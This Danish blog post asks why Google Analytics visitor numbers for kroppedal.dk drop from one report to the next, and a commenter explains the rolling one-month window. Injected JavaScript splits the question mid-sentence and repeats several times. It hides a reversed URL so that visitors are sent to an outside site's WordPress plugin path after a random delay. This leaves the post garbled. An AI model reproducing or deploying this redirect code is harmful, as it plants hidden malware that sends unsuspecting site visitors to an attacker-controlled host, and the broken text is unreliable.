Faldende tal i Google Analytics

Der er noget der undrer mig. I web rapporten den ene dag står der f.eks. at www.kroppedal.dk siden 1. april har haft 75 besøgende fra Tyskland og 750 fra Albertslund. I rapporten toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to dage senere kan tallene være lavere. Det samme gælder f.eks. tallene for besøg på forskellige dele af sitet. Er der nogen der ved, hvordan det kan være at tallene falder, det er vel kumulative værdier, der er tale om.

 

Med venlig hilsen

 

Jakob

One comment to “Faldende tal i Google Analytics”
  1. Er du 110% sikker på at det er for den samme periode? Hver dag du logger ind, så går den jo ca. 1 måned tilbage. Dvs. at der er dage som “forsvinder” og nye dage som kommer til.
    Hvis du logger ind 1 april ser du formentlig perioden 1/3 – 1/4. Hvis der så har været fx 100 tyskere den 1 marts, men ingen resten af måneden, så bliver de jo ikke regnet med, hvis du logger ind igen for at se en måned tilbage den 2. april. Når du ser perioden 2/3 – 2/4, er tyskerne forsvundet.

    Gav det mening? Var det dét du mente?

Skriv et svar